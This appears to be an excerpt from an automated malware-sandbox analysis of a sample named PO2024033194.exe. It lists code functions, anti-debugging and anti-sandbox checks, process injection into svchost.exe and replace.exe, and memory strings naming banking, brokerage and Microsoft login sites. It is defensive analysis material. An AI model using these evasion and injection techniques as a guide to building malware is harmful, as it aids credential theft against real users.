            Source: Binary string: svchost.pdb source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: PO2024033194.exeStatic PE information: real checksum: 0xa961f should be: 0x15caf6
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AA036 push edi; ret 2_2_003AA03F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A8027 push ds; ret 2_2_003A8028
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A4079 pushfd ; iretw 2_2_003A40C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003BD853 push edi; iretd 2_2_003BD85C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A4158 push edi; ret 2_2_003A4159
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039D1BA push ss; retf 2_2_0039D1BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039222C push ecx; retf 2_2_0039231F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AAA87 push edi; iretd 2_2_003AAA93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039D3DC push es; ret 2_2_0039D3E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A543B push ebp; iretd 2_2_003A543C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A5474 push edx; ret 2_2_003A5475
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003934A0 push eax; ret 2_2_003934A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A8D13 push edi; ret 2_2_003A8D14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00398682 push fs; iretd 2_2_00398684
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A7F3A push ecx; retf 2_2_003A7F3B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A3F43 pushfd ; iretw 2_2_003A40C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F6823 push edi; iretd 3_2_081F682F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081E616C push ebp; iretd 3_2_081E616D
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F11D7 push ebp; iretd 3_2_081F11D8
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F1210 push edx; ret 3_2_081F1211
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F5DD2 push edi; ret 3_2_081F5DDB
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_082095EF push edi; iretd 3_2_082095F8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A8225F pushad ; ret 4_2_03A827F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A827FA pushad ; ret 4_2_03A827F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AB09AD push ecx; mov dword ptr [esp], ecx4_2_03AB09B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A8283D push eax; iretd 4_2_03A82858
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A81368 push eax; iretd 4_2_03A81369
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0324A3B0 push edi; iretd 4_2_0324A3B9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03240294 push 8DB602B4h; retf 4_2_0324029A
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO2024033194.exeAPI/Special instruction interceptor: Address: 4166324
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A480C rdtsc 2_2_003A480C
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 4501Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 5472Jump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87516
            Source: C:\Users\user\Desktop\PO2024033194.exeAPI coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 2.6 %
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664Thread sleep count: 43 > 30Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664Thread sleep time: -64500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748Thread sleep count: 4501 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748Thread sleep time: -9002000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748Thread sleep count: 5472 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748Thread sleep time: -10944000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0323C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0323C230
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 6U0173jM.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 6U0173jM.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 6U0173jM.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: firefox.exe, 00000008.00000002.2572599815.000001AE21F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~J
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 6U0173jM.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 6U0173jM.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: drBzjAnGBElC.exe, 00000003.00000002.4625009743.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 6U0173jM.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 6U0173jM.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 6U0173jM.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 6U0173jM.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 6U0173jM.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\PO2024033194.exeAPI call chain: ExitProcess graph end nodegraph_0-86639
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A480C rdtsc 2_2_003A480C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A75E3 LdrLoadDll,2_2_003A75E3
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_04166590 mov eax, dword ptr fs:[00000030h]0_2_04166590
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_041665F0 mov eax, dword ptr fs:[00000030h]0_2_041665F0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_04164F40 mov eax, dword ptr fs:[00000030h]0_2_04164F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
